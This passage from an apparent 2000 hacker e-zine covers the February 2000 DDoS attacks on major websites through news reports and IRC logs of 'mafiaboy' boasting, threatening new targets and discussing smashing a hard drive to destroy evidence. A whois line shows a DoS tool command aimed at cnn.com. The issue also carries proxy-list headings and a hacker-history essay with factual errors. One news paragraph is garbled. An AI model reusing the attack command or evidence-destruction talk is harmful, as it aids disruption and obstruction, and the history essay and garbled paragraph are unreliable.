     brag the way he did about it." 

     FBI Interviews Coolio

     ABCNEWS has also learned that the FBI has 
     interviewed a hacker called coolio in connection with last week's Web 
     attacks, but he denied any involvement. FBI officials told ABCNEWS' Brian 
     Ross they had tracked down the teenage hacker in Southern California 
     because they believed he might have useful information for their 
     investigation. Coolio is well known to authorities as a member of Global 
     Hell, a group of teenagers who have hacked into White House and Department 
     of Defense computer systems. The officials said members of Global Hell are 
     still under investigation in connection with last week's Web attacks. The 
     FBI also wants to question a hacker known as nachoman. Officials have 
     been careful to say they are not suspects, but just want to talk to them 
     about important information relating to the attacks. 

     Fast-Developing Leads

     In Washington, FBI Director Louis Freeh said 
     investigators are running down hundreds of leads related to the Web 
     attacks, but still face substantial hurdles. "There are fast developing 
     leads as we speak," Freeh told a Senate subcommittee. Freeh said the 
     investigation has led the FBI to at least four other countries, including 
     Canada and Germany. He also said FBI field offices in five cities are 
     participating in the investigation: Los Angeles, San Francisco, Atlanta, 
     Boston and Seattle. The FBI began investigating after leading Web portal 
     Yahoo! was attacked and made inaccessible for several hours on Feb. 7. 
     Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And 
     on Feb. 10, technology site ZDNet and online trading site E*TRADE suffered 
     attacks. As many as 13 Web sites may have been attacked. Known as 
     denial-of-service attacks, the assaults effectively overloaded Web sites 
     with mock traffic so that real users couldn't access the sites. The 
     culprits took over computers in various parts of the world and used them to 
     bombard the victims' sites with data. Investigators have located more than 
     a half-dozen computers used in last week's attacks. Computers at two 
     California universities, a Midwestern school, a Berlin university, a 
     non-university site in Southern California, a home business in Oregon, and 
     machines at at least four companies were used as zombies. 

 
     EPA Shuts Down Web Site

     The U.S. Environmental Protection Agency Thursday 
     said it had shut down its Web site for fear of computer hacker attacks 
     after security deficiencies were made public this week. EPA said the site, 
     accessed millions of times over the course of any given month, will be down 
     for a week or two until an ongoing security upgrade program is complete. 
     The agency has been working with the General Accounting Office (GAO) and 
     the office of Inspector General for several months to strengthen the 
     security of our Web site, EPA said. The decision to temporarily close 
     access to the Web site was made after a meeting Wednesday with computer 
     security experts, the agency said. The experts told EPA officials that 
     recent public attention on the agency's potential computer vulnerabilities 
     made the site a likely target for hackers. Wednesday, House Commerce 
     Committee Chairman Thomas Bliley, a Virginia Republican, released a letter 
     from GAO officials dated late last year on the serious threat to 
     sensitive information on EPA computers. GAO told Bliley that hackers could 
     possibly enter EPA's computer systems via the Web site, unless new fire 
     walls were created. Bliley called for the site to be taken down and 
     Thursday said the EPA acted appropriately to protect sensitive and 
     confidential information on its systems. "It is unfortunate that the 
     American people temporarily will not have access to the important public 
     information contained on the EPA Web site," Bliley said in a statement. 
     "That sad fact is the fault of no one other than EPA Administrator Carol 
     Browner and her management team. Had they heeded seven years of warnings by 
     security experts and performed their duties with even a modicum of 
     responsibility over this time, last night's shutdown would not have been 
     necessary," he said. EPA spokesman Dave Cohen said the agency was 
     saddened by having to take the Web site down, noting it is a popular 
     outlet for the public to access all types of information on air and water 
     pollution in local communities. "We were afraid it had become a real 
     target," Cohen said.    
     
     
     Additional info from Vetesgirl
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     01/19/2000

     For those Defending MafiaBoy   by VetesGirl
     Mafiaboy is the one who got himself busted, so stop msg'ing me
     with your lame shit. 1. Mafiaboy is the one who got on EFNET and
     boasted to everyone that he was the one behind the attacks and put
     on DoS shows to show how elite he was, he sat in #!tnt boasting
     how elite he was and how the FEDS were fools.  Supposedly while
     being watched by the FEDS he telnet'd to hacked shells, continued
     to DoS and continued blowing off.  Mafiaboy is a DUMB FUQ and
     now has the Fame he wanted for so long.  I wonder if he is thinking
     the FEDS are fools now, and I also wonder who he is flippin on. A
     few of us on efnet got a kick out of whoever bot'd his nick.
     +---------------------------------------
     | mafiaboy <~guest@www.oaklandathletics.com> (Internic Commercial)
      ircname  / ./slice 0 cnn.com 22 80
      server   / irc.mcs.net ([192.160.127.97] MCSNet Services -
     (312)803-MCS1)
     +--------------------------------------------------
     
      
     @HWA
     
04.1 The MafiaBoy IRC logs
     ~~~~~~~~~~~~~~~~~~~~~
     
     A glimpse into the goings on and mindset of MafiaBoy accused copy cat
     DDoS perpetrator of recent major massive DDoS strikes on well known
     web sites. - Ed
     
     
     
     Source: Mshadow
     
     Rants:
     ~~~~~
     
     [12-Feb:12:48 anon] t3 to show them that they are dumb fucks with billions of dollars
     [12-Feb:12:48 databurn:#infinity] be all scared
     [12-Feb:12:48 databurn:#infinity] and pussies
     [12-Feb:12:48 anon] that cant even get proper admins
     [12-Feb:12:48 anon] he should
     [ Whois anon!~anonymous@Jupiter.mcs.net ]
       : ircname  : $null
       : channels : #!tnt @#%# 
       : server   : irc.mcs.net ([192.160.127.97] MCSNet Services - (312)803-MCS1)
     [12-Feb:12:48 anon] notify the fucking owner
     [12-Feb:12:48 anon] to put more filters
     
     
     Rants #2
     ~~~~~~~~
     
     FYI: anon in these logs is MafiaBoy
     
     
     Session Start: Sat Feb 12 12:45:40 2000
     [12:45] *** Now talking in #!tnt
     [12:45] <[T3]> hahahhaha
     [12:45] <anon> SNIFF ME FBI!!
     [12:46] <Mshadow> Interactive news
     [12:46] <Mshadow> :\
     [12:46] <Mshadow> you packet something
     [12:46] <Mshadow> it goes on tv
     [12:46] <anon> t3
     [12:46] <anon> can u connect to dell?
     [12:46] <anon> some people say yes
     [12:46] <anon> some say no
     [12:46] <[T3]> i can't browse the web
     [12:47] <anon> fool's dont know what a cache is
     [12:47] <anon> telnet to it port 80
     [12:47] <[T3]> period, my modem is totally fucked
     [12:47] <[T3]> everything times out
     [12:47] <[T3]> uh no thanks
     [12:47] <anon> and GET /m
     [12:47] <swinger-> anon. it lods but like slowly
     [12:47] <swinger-> heh now its reallly lagged
     [12:48] <Mshadow> Are you just hitting it with a stream attack?
     [12:48] <anon> mshadow
     [12:48] <anon> no
     [12:48] <anon> my personal attack
     [12:49] <Mshadow> hehe
     [12:49] <Mshadow> What kinda packets?
     [12:49] <anon> which is spoofed ++
     [12:49] <anon> its sorta a mix
     [12:49] <anon> a new type
     [12:49] <anon> and syn
     [12:49] <[T3]> spoofed++, lol
     [12:49] <[T3]> it's either spoofed or not spoofed
     [12:49] <[T3]> there is no "elite" spoof
     [12:50] <[T3]> but
     [12:50] <[T3]> i think there's methods to trace spoofed packets
     [12:50] <Mshadow> Yea
     [12:50] <[T3]> if you catch it while it's flooding
     [12:50] <Mshadow> they have go router to router
     [12:50] <Mshadow> to trace the packets back
     [12:50] <Mshadow> only takes like 20 min
     [12:53] <[T3]> mafiaboy
     [12:53] <[T3]> so who's next
     [12:53] <[T3]> after dell
     [12:53] <Mshadow> You know wait till they talk about it on msnbc
     [12:53] <swinger-> ms
     [12:53] <swinger-> should be next
     [12:53] <Mshadow> and drop the chat server
     [12:53] <Mshadow> :\
     [12:53] <[T3]> lol
     [12:54] <anon> t3
     [12:54] <anon> tonight
     [12:54] <anon> i put this computer
     [12:54] <anon> in the fireplace
     [12:54] <swinger-> heh
     [12:54] <Mshadow> haha
     [12:54] <anon> i aint joking 
     anon is ~anonymous@Jupiter.mcs.net * $null
     anon on #!tnt 
     anon using irc.mcs.net [192.160.127.97] MCSNet Services - (312)803-MCS1
     anon End of /WHOIS list.
     [12:55] <Mshadow> why don't you just take out the hd
     [12:55] <Mshadow> and kill that
     [12:55] <Mshadow> tehn put a new one in
     [12:55] <Mshadow> :\
     [12:55] <anon> mshadow
     [12:55] <anon> i dont want to take ANY chances
     [12:55] <Mshadow> really and talking on irc is not a chance?
     [12:55] <anon> what can irc prove
     [12:55] <anon> i can be bluffing 
     [12:57] <[T3]> mafia
     [12:57] <anon> uhmm
     [12:57] <anon> fuck it
     [12:57] <anon> fuck the fire place
     [12:57] <anon> sledge hammer
     [12:57] <anon> instead
     [12:57] <[T3]> it's spoofed++
     [12:57] <[T3]> they can't catch you :\
     [12:57] <anon> t3 dont give a fuck
     [12:57] <Mshadow> haha
     [12:57] <[T3]> heh
     [12:57] <anon> dont take chances
     [12:57] <Mshadow> t3 you should make a tcl that spoffs ++
     [12:57] <Mshadow> spoofs 
     [12:57] <[T3]> aren't you going to go out with a bang at least?
     [12:58] <anon> yes
     [12:58] <Mshadow> Drop like 10 core routers :\
     [12:58] <[T3]> hahahha
     [12:58] <anon> no
     [12:58] <[T3]> what are you gonna do
     [12:58] <anon> micrsoft
     [12:58] <anon> microsoft will be gone for a few weeks
     [12:58] <[T3]> HAHAHAHAHHAHAHAHHAHAHAHAHH
     [12:58] <Mshadow> haha
     [12:58] <[T3]> oh man
     [12:58] <[T3]> that's evil
     [12:59] <anon> MAYBE
     [12:59] <anon> i m thinking something big
     [12:59] <anon> maybe
     [12:59] <anon> www.nasa.gov
     [12:59] <[T3]> i need to get away from you before i get busted for being an accomplice or some shit
     [12:59] <anon> or www.whitehouse.gov
     [12:59] <anon> maybe im just bluffing
     [12:59] <[T3]> they can always change ip's, ya know
     [12:59] <anon> and i wont do shit
     [12:59] <anon> who knows
     [12:59] <anon> t3 "hit the router"
     [12:59] <[T3]> you have to use some sort of resolving technique
     [12:59] <anon> i mean
     [12:59] <anon> mDoS
     [12:59] <[T3]> they can change the ip of the router too
     [12:59] <anon> the whole router list
     [13:00] <anon> i know what im doing
     [13:00] <anon> yahoo.com
     [13:00] <[T3]> haha
     [13:00] <anon> does that ip changing shit too
     [13:00] <[T3]> so mafiaboy, it was really you that hit ALL those ones in the news?
     [13:00] <anon> u just pin em so hard they cant even redirect
     [13:00] <[T3]> buy.com, etrade, ebay
     [13:00] <anon> t3 maybe
     [13:00] <[T3]> all that shit?
     [13:00] <anon> who knows
     [13:00] <[T3]> haha
     [13:00] <anon> would only awnser
     [13:00] <anon> that under ssh2
     [13:01] <anon> i might
     [13:01] <anon> pmg the hd
     [13:01] <anon> and sledge hammer
     [13:01] <anon> and through it in a lake
     [13:01] <[T3]> they say that you're costing them millions of dollars
     [13:01] <anon> surprised
     [13:01] <anon> i didnt even get raided yet
     [13:02] <anon> t3 : they are fools
     [13:02] <anon> maybe
     [13:02] <[T3]> i don't think this has anything to do with being a "fool"
     [13:02] <anon> i might hit
     [13:02] <swinger-> amazon.com st0ck!
     [13:02] <[T3]> maybe those that coded tcp/ip are fools
     [13:02] <anon> every efnet hub
     [13:02] <anon> for weeks
     [13:02] <[T3]> or cisco
     [13:02] <[T3]> fuck efnet
     [13:03] <[T3]> efnet doesn't make the news
     [13:03] <swinger-> i know
     [13:03] *** Disconnected
     Session Close: Sat Feb 12 13:03:08 2000
     
     @HWA
     
04.2  Mounties Know Mafiaboy
      ~~~~~~~~~~~~~~~~~~~~~~

      Contributed by SugarKing

      Source: Computer Currents
      url: http://www.currents.net/newstoday/00/02/18/news5.html
      
      
      The Royal Canadian Mounted Police (RCMP) reportedly knows the name of a Canadian 
      teenager going by the online handle mafiaboy, who has been fingered as one of 
      several possible perpetrators of a series of Distributed Denial of Service 
      (DDoS) attacks on several major US and Canadian Web sites last week.
      
      Several news reports today indicate that the RCMP served a warrant on Look 
      Communications Inc.'s Montreal office last Tuesday that sought information the 
      Internet service provider (ISP) had on a former customer using the online 
      identity mafiaboy. Look operates Internet .2-887-1420/WIRES ONLINE, 
      BUSINESS/)er, ytes.com .on Web site at to which mafiaboy had reportedly been a 
      subscriber. Delphi is said to have terminated the connection in 1998 following 
      abuse of service allegations.
      
      The Toronto Globe & Mail newspaper quotes a company official as saying, "We have 
      turned the information over to the police, it's now in their hands."
      
      RCMP spokesman Corporal Stéphane Bonin would not confirm the report, the 
      newspaper said, and referred questions to the FBI, which is said to be leading 
      the investigation into the massive "smurf" attacks which brought down such major 
      sites as eBay, Amazon and CNN. But, FBI spokeswoman Debbie Weierman would not 
      say whether any suspects have yet been identified, the report said.
      
      FBI Director Louis Freeh has reportedly said the bureau's investigation has now 
      broadened to include Canada, Germany and several other countries, and that 
      agents were working on "fast-developing leads."
      
      News reports have stated that police in Canada and the US are focussing on 
      several hackers, including mafiaboy, Coolio and Nachoman, who have claimed 
      responsibility for recent acts of vandalism.
      
      A Look official refused to divulge information on mafiaboy but said the data 
      turned over to the RCMP contained the user's name, address, and telephone and 
      credit card numbers, according to news reports today.
      
      The Globe & Mail also reported that experts have said that mafiaboy's newfound 
      notoriety has apparently spawned a rash of copycats using the same pseudonym, 
      and added that a computer specialist was able to quickly locate the Web site 
      addresses for 73 users worldwide, including at least four in Canada, who were 
      using the mafiaboy handle as of Wednesday.
      
      @HWA


     
 
           
     
     
05.0 Updated proxies and wingates...from irc4all and elsewhere
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.lightspeed.de/irc4all/
     
     Usual source, plus some snarfed from Vetesgirl's site self-evident.com (at end)
     
     Lightspeed list Feb 18th
     ~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     
     
     WINGATES
     ~~~~~~~~
                                                                       
                                                                       
     (C) Paradox
                                                                                                                                                                             
                                                                                                                                                                             
     Socks Proxies
     ~~~~~~~~~~~~~
     
     
     - Updated 02/12/2000 -
     
     Now a new update, please send me some socks to keep this page alive. 
     Programs to scan your own socks are on the files page. 

     Your Paradox@CyberJunkie.com

     Sometimes the socks-servers on this page are a little bit busy, so try 
     again later or use the telnet-gates 
     
     SOCKS 4 (Port 1080)
     ~~~~~~~~~~~~~~~~~~~
     
     
     
     SOCKS 5 (Port 1080)
     ~~~~~~~~~~~~~~~~~~~
     
     
     
     WINGATES
     ~~~~~~~~
     
     EoF
     
     
     Check http://www.lightspeed.de/irc4all/ for MORE lists/updates.
     
     -=-
     
     Extra Stuff
     ~~~~~~~~~~~
     
     From Vetesgirl's site:
     
     http://www.polito.it/~montru/en-proxylist.html  see below
     http://www.cl.spb.ru/sparta/list.htm............NO DATA AVAILABLE
     http://plist.elan-ua.net........................Page thru data manually.
     http://proxys4all.cgi.net.......................general info.
     
     
     -=-
     
     
     Software/Scanners:
     ~~~~~~~~~~~~~~~~~~
     
     http://www.self-evident.com/exploits/proxy 
     
     EoF
     
     Following list retrieved: Friday evening late 10p-11p (EST) Feb 18th
     
     Source: http://www.polito.it/~montru/en-proxylist.html
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Updates: unknown
     
     Proxy server address     Port
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     EoF
     
     
     Lists compiled but NOT verified by C*:. - Ed
     
     
     @HWA
     
06.0  HNN:Feb 14:FBI Zeros in on Two Possible Suspects      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      FBI Zeros in on Two Possible Suspects 


      contributed by evenprime 
      Agents for the FBI have identified two possible suspects
      in last week's massive denial of service attacks.
      Fox News 
      http://www.foxnews.com/vtech/0214/t_rt_0214_13.sml
      

      Stanford, UC Santa Barbara, UCLA, named as
      Possible Launch Sites
      Computers at Stanford, UC Santa Barbara, UCLA, and
      unidentified systems in Germany may have been used as
      possible launch sites for the massive denial of service
      attacks.
      Associated Press - via Yahoo 
      http://dailynews.yahoo.com/h/ap/20000212/tc/hacker_investigation_8.html
      

      Mixter Witch Hunt Begins
      The author of one of the tools that may have been used
      in the attack is wanted for questioning by NIPC. This
      after sources traced back one of the attacking
      machines to Germany. (Since Mixter lives in Germany he
      must be guilty, great logic.)
      CNN
      http://www.cnn.com/2000/TECH/computing/02/13/hacker.trail.01/index.html
      
      Reuters - via Excite
      http://news.excite.com/news/r/000213/10/net-tech-hackers
      
      C|Net 
      http://news.cnet.com/news/0-1005-200-1548566.html?dtn.head

      Attacks Have Little Impact on Shoppers
      Early feedback from Web merchants nailed by hackers
      this week suggests that high-profile denial-of-service
      attacks that struck Yahoo!, Amazon.com, eBay and
      others (including ZDNet) are having little impact on
      online shopping during the busy Valentine's Day period.
      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2436696,00.html

      Questions Raised About NIPC Tools
      Some people have doubts about closed-source tools
      from NIPC to search for DDoS agents.
      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2437096,00.html
      
      
      FOX;
      
      Report: Investigators Focus on Two Known Hackers
      
      7:16 a.m. ET (1216 GMT) February 14, 2000
      
      NEW YORK - Federal agents investigating recent attacks on computers 
      that overwhelmed popular Web sites belonging to Yahoo! Inc. (YHOO.O)
      and Amazon.com Inc. (AMZN.O) are focusing on two known hackers, The 
      Wall Street Journal reported Monday.
      
      So far, the two potential suspects have been identified only by their
      online pseudonyms, the newspaper said.
      
      Although many in the Internet security community initially described
      the attacks as unsophisticated, it now appears that at least one of 
      the attackers may have been far more skilled than the apparent 
      subsequent copycats, David Brumley, a system-software developer in
      Stanford University's information-technology department, told the 
      Journal.
      
      
      The hacker, believed to be responsible for the Yahoo attack,
      the first of the assaults, mounted a complex operation using
      highly customized tools, Brumley told the Journal.
      
      Law enforcement officials told the Journal they haven't come
      up with hard suspects.
      
      
      Brumley said the hacker's online pseudonym is known, but he
      declined to reveal it citing concerns about jeopardizing the
      investigation, the Journal said.
      
      A second less skilled hacker is believed to live in Canada
      and was being watched as a possible copycat, Michael Lyle, chief
      technical officer of Internet security firm Recourse
      Technologies Inc. told the Journal.
      
      That hacker, known online by the pseudonym "mafiaboy," allegedly
      was recorded in an Internet hacking channel soliciting orders to
      shut down Time Warner Inc.'s (TWX.N) Cable News Network and
      E-Trade Group Inc. (EGRP.O).
      
      -=-
      
      AP->Yahoo
     
      Saturday February 12 1:16 AM ET 
     
      Links in Computer Attacks Traced
     
      By TED BRIDIS Associated Press Writer 
     
      WASHINGTON (AP) - Experts investigating recent attacks against major 
      commercial Web sites say a computer and an Internet device used by vandals 
      as weapons have been traced to two California universities.

      The vandals used a desktop computer at the University of California, Santa 
      Barbara, and an Internet router - a device that can amplify data traffic - 
      from Stanford University, officials at both schools acknowledged 
      Friday.

      There was no indication that anyone at either university was directly 
      involved, only that their equipment was used. Experts believe dozens of 
      computers nationwide were hacked and had electronic attack software 
      secretly installed.

      ``They've attacked us in a way that hurts what we do as a university, and 
      hurts all universities,'' said Robert Sugar, chairman of the information 
      technology board in Santa Barbara. The school's computer was believed used 
      in the attack against CNN's Web site Tuesday.

      Stanford said one of its routers located at a remote wildlife preserve was 
      used to transmit some of the data aimed against the Web site of auction 
      operator eBay for about 30 minutes before engineers blocked hackers from 
      using it.

      ``It's really out in the middle of nowhere,'' said Dave Brumley, assistant 
      computer security officer at the university. He said engineers have 
      checked Stanford's other routers to prevent their similar misuse.

      Meanwhile, investigators suggested that the vandals in Monday's attack 
      against the Yahoo! Web site - the first to be shut down for hours - may 
      have been far more sophisticated than originally believed.

      Ronald Dick, a senior official with the FBI's National Infrastructure 
      Protection Center, said earlier this week that automated hacker tools 
      widely available on the Internet mean that ``a 15-year-old kid could 
      launch these attacks.''

      ``This is not something that it takes a great deal of sophistication to 
      do,'' Dick said.

      But e-mail from engineers for search engine Yahoo! describing the attack 
      in detail said the vandals apparently ``knew about our topology and 
      planned this large-scale attack in advance,'' and that other companies hit 
      this week also were targeted ``where it hurts the most.''

      This e-mail, sent as a warning to some Internet providers and obtained by 
      The Associated Press, also described the Yahoo! attackers as ``smart and 
      above your average script-kiddie,'' a derisive term for an unskilled 
      hacker. It said the vandals ``probably know both Unix and networking 
      ... pretty well and learn about site topology to find weak spots.''

      An executive at GlobalCenter Inc., which provides Yahoo!'s Internet 
      connection, also said Friday that engineers there were surprised during 
      the attack, which flooded Yahoo! with more data each second than some 
      major Web sites receive under normal conditions in a week.

      ``About an hour into the initial attack, they were already commenting 
      about what appeared to be some level of sophistication,'' said Laurie 
      Priddy, the company's executive vice president. ``These (vandals) seemed 
      pretty smart who were doing it.''

      ``Denial of service tools are widely available and do not require great 
      sophistication to use,'' said a federal law enforcement official who 
      requested anonymity. ``But what we've seen already does seem to be a 
      somewhat sophisticated attack.''

      At the White House, President Clinton said the Internet offers new 
      opportunities for people ``just mischievous and people who have far darker 
      motives.'' But he also held out hope that America will ``develop better 
      defenses and better defenders.''

      ``If you go back from the beginning of time, where things of value are 
      stored, people with bad motives will try to get to those things,'' Clinton 
      said. ``Now vast things of values are stored in our computers and 
      transactions of great values occur on the Internet.''

      Also Friday, Excite.Com - a popular search engine for the Web - said its 
      site also was targeted earlier this week by attackers. A flood of data 
      disrupted service for about half its customers for about one hour 
      Wednesday night until the attack suddenly ended without warning, 
      spokeswoman Kelly Distefano said.

      In these attacks, called ``distributed denials of service,'' hackers 
      secretly install software tools on dozens or hundreds of powerful but 
      insecure computers - usually those of corporations or universities - then 
      remotely direct crippling floods of electronic data at target Web 
      sites. 
      
      -=-
      
      CNN;
      
      Hacker hunters follow lead to Germany

      Web site attackers exploited Stanford computers

      February 13, 2000
      Web posted at: 4:13 p.m. EST (2113 GMT)

      From San Francisco Bureau Chief Greg Lefevre

      BERLIN (CNN) -- Cyber detectives tracking hackers who launched an 
      electronic offensive on several top Web sites have followed a lead
      to Germany.

      A program called "Stacheldraht" (Barbed Wire) was used to carry out 
      the attacks and whoever ran the program used its German name, a report
      in Die Welt newspaper said. 

      The FBI-led National Infrastructure Protection Center
      is working on a theory that the Internet vandal
      responsible for Tuesday's attacks may be based
      somewhere in Germany. 

      U.S. President Bill Clinton has called a summit on
      Internet security for next week. 

      High capacity computers fooled by
      vandals

      Computers at a remote marine research campus
      operated by Stanford University near Monterey,
      California, were among those fooled on Tuesday into
      helping hackers attack some of the Internet's most
      heavily used sites, the head of Stanford's computer
      security department says. 

      Stephen Hansen, head of computer security at the
      school, said about 50 Stanford computers were
      fooled into helping route the denial of service attacks
      on Web sites, including eBay.com, CNN.com,
      Amazon.com, Buy.com and Yahoo! 

      Such computers are sometimes called "zombie"
      computers. In a denial of service attack, they send
      commands to high capacity computers that flood the
      affected Web site with millions of messages,
      blocking access to would-be users. 

      This kind of hack floods a Web site with so many
      requests it can't cope. Sources told CNN that Yahoo!
      was hammered with requests at one gigabyte per
      second. 

      That is similar to 104 million people dialing one company's phone lines
      at once. 

      Network engineer there in minutes

      Hansen said, "Within minutes we had a network engineer there. He went
      into the configuration and said 'OK, turn that off, don't allow them 
      to do that anymore.' 

      "Any time from that point on, any of those packets that arrived were 
      ignored. I'm glad we were able to find it quickly and were able to deal
      with it in short order." 

      Universities can be sitting ducks to these attacks, since schools want
      professors, researchers and students to have easy access to computers 
      to share research and swap information. 

      Stanford joins the University of California at Santa Barbara as victims 
      of the high-tech hijackings, in which the zombie computers are enslaved 
      to the command of hackers. 

      Kevin Schmidt, the UCSB campus network programmer, said, "If you go to a
      university, you have many different constituent groups. You've got 
      research groups, you've got people here for one year, you've got visiting
      research faculty." 

      Firewall is first line of defense

      The first defense against hackers is a software block called a firewall 
      -- but that may also keep out the very people for whom the system is 
      intended. 

      One of the Internet's original uses was to link scholars around the world 
      easily. Research projects at universities typically make it difficult to 
      implement an effective firewall, since a large number of openings are 
      needed for people to go through. 

      The recent spate of attacks may force universities to choose between 
      academic freedom and system security. 

      'Lots of computers were vulnerable'

      Sources told CNN the denial of service hacks were not sophisticated. They
      were done using ready-made programs. The hope is that with so many attacks,
      one of them is bound to leave traces. 

      Tribal Village (TFN) and Trinoo are two of the programs that experts say 
      are Internet time bombs -- ones used to jam the highly used sites. 

      Allison Taylor, of Network Associates, said, "They're roadmaps for people
      to copy from, and then you have copycat attacks over and over and over." 

      Taylor added, "We've found them in several places. They're prepackaged. 
      The hacker downloads and hacks the program into a number of unsuspecting
      computers. 

      "For this attack to happen on all these companies there had to be lots of
      computers out there that were vulnerable." 
      
      -=-
      
                 
      
      
      @HWA
      
      
07.0  A brief history of hackers By meliksah
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      By meliksah
      Writer for Turkish Security Site http://www.trsecurity.net/
      
      Email: meliksah@meliksah.net      
      
      History of Hackers:

      Everything began with the start of the telephone company (Bell 
      Telephone). At that time there were inexperienced hackers. Of course, 
      in 1878 we did not call them hackers. They were young people who worked 
      at the local power station just to have fun. They had an instinct for 
      giving wrong invoices to people they disliked, and they diverted 
      telephone calls to the wrong lines. 

      The first computer pirates were seen in the 60s, at MIT (Massachusetts 
      Institute of Technology). There were hundreds of people who wanted to 
      learn these computer programs. In those times computers were kept in 
      cooled rooms and data was kept on punched paper. They couldn't do what 
      they wanted, so the clever people found "hacks", shortcuts to their 
      aims. Their aim was to do things in a faster way. The word "hack" was 
      first used in the 60s. Maybe the best hackers of all time were Dennis 
      Ritchie and Ken Thompson, who worked at Bell Labs in 1969. They created 
      Unix, and it was state of the art.

      In the 70s there were so many cyberlands to discover. Hacking was only 
      about understanding how the cabled world worked. In 1971 John Draper, 
      who had been in the Vietnam war, discovered that there was a 2600 Mhz 
      tone. When he collected Cap'n Crunch cereal boxes, he won a whistle. 
      People could blow the whistle and talk without paying money, because 
      the tone was breaking the telephone lines. At that time phreaking 
      (talking for free) wasn't seen as harmful because it was harmful only 
      to the telephone companies. It didn't affect profits much, so it wasn't 
      important to the companies. Through the Youth International Party Line 
      magazine all of the USA heard about this discovery. In 1978 two boys 
      from Chicago, Randy Suess and Ward Christensen, discovered the BBS 
      system, which was used on personal computers.

      In 1981 IBM produced the first PCs, which people used for everything. 
      But young people paid more attention to the Commodore 64 and the 
      Spectrum because they were cheaper. In 1983 a film called War Games 
      came to the cinemas. Through this film, which served as a warning, 
      people came across hackers. People understood that hackers could use 
      every system and could get into any computer. But hackers changed 
      people's minds and told them that you could find beautiful girls with 
      these kinds of systems, so the background was changing slowly and 
      Arpanet was turning into the Internet. The popularity of BBSs was the 
      point of explosion, and people met a hacker group called 414 in 
      Milwaukee. They broke computer passwords from the Los Alamos 
      Laboratory to the Manhattan Cancer Institute and changed their data. 
      Then the 414 members were captured by the police.

      The hacker wars started in 1984. A pirate called Lex Luthor formed a 
      group named Legion of Doom (LOD). The group was very successful, but 
      Phiber Optik left the group and formed a new one in 1990 named Masters 
      of Deception (MOD), and they were at war until 1992. They changed the 
      philosophy of pirating from "reaching secret information" to 
      "destroying the other group".

      In 1992 the FBI arrested Phiber Optik and his friends, and the hacker 
      wars ended with this event. Once the government came online, the fun 
      was over. They even made laws in the country to reduce the number of 
      hackers. In 1988 Robert Morris and the Net Worm appeared. They 
      destroyed 6000 systems at the same time and they were the first people 
      to go to jail under these new laws. They had to pay 10.000$ and spend 
      their time on community service. Afterwards some others appeared in 
      this cyberland, destroyed the systems of Digital, and went to jail for 
      one year. The government ran an operation named Operation SunDevil to 
      catch the hackers. In particular they wanted to end the Legion of 
      Doom's actions. Then, on information from the LOD, four MOD members 
      were caught by the police. In 1994 a Russian mathematician formed a 
      group and caused a 12 million dollar loss for Citibank. Vladimir was 
      caught at the airport in London. Kevin Mitnick was caught too, for 
      stealing 20.000 credit card numbers. However, he has been in prison 
      since 1995. People were badly affected by this news. A phobia began 
      among net users; American people called this situation Anarchy.

      Now people call hackers troubled people and troublemakers; their 
      status has changed a lot. What about now? Who is on the scene? Now 
      there are not many legendary names, but there is still preparing and 
      programming. There is a saying in the hacker mafia: if you are a good 
      hacker everybody knows your name, but if you are the best one nobody 
      knows whether you are alive. 
 
      Resources
      Discovery Channel
      Chip Turkey
 
      Last Update : 27/12/1999
 
 
      (C)opyright Meliksah Ozoral
      All Rights Reserved 
      
      @HWA
      
08.0  New phreaking zines released can you dig the retro?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      For your review, I'm posting issues one and two here.
      
      Find them on angelfire (gak) at http://www.angelfire.com/yt/smite/
      these are brand new zines (and you can tell) but maybe they'll
      turn into something decent in the future, phreak info is hard
      to find and a tough job for anyone to attempt to take on - Ed
      
      Horrible formatting corrected where possible, all caps are
      theirs...(?) nothing new and mediocre content but it's a fresh
      attempt by some newbies to revive a cliquey scene.
      
      These were released this year despite the incredibly retro
      look, believe it or not. Last issue was released Feb 2000. -Ed
      
      
      
      
      
      SMITE ISSUE #1
      ~~~~~~~~~~~~~~
      
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      $$$$    $$$ $$$$ $$$ $$$     $$$     $$$$
      $$$$ $$ $$$  $$  $$$ $$$$$ $$$$$ $$$$$$$$
      $$$$$ $$$$$ $  $ $$$ $$$$$ $$$$$  $$$$$$$
      $$$$$$ $$$$ $$$$ $$$ $$$$$ $$$$$ $$$$$$$$
      $$$$ $$ $$$ $$$$ $$$ $$$$$ $$$$$ $$$$$$$$
      $$$$    $$$ $$$$ $$$ $$$$$ $$$$$     $$$$
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      $$$$$$$$$$$$$$$$$ISSUE ONE$$$$$$$$$$$$$$$
      $$$$$$$$$$$$$$$DECEMBER 1999$$$$$$$$$$$$$
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      
      
      CONTENTS:
      
      -INTRODUCTION
      -SHOP CLASS: POOR MAN'S TONE DIALER
      -CHEAPSKATE'S CORNER: FREE COKES
      -'LEET LITTLE 'SPLOITS: FREE NET ACCESS
      -NEWS YOU SHOULD KNOW (BUT PROBABLY DON'T): FREE SPEECH? BAH!
      -CLOSING 
      
      *************************************************
      *                  INTRODUCTION                  *
      **************************************************
      
      THIS IS THE FIRST ISSUE. WHAT MORE CAN I SAY? LIKE IT OR DON'T--LET ME
      KNOW.
      
      
      
      
               ###SHOP CLASS FOR THIS MONTH###
      
      **************************************************
      *      THE POOR MAN'S TONE DIALER -- BY EGGO     *
      **************************************************
      
      SO YOU'RE CHEAP, NO, VERY CHEAP. YOU CAN'T AFFORD $24 FOR A RAT SHACK
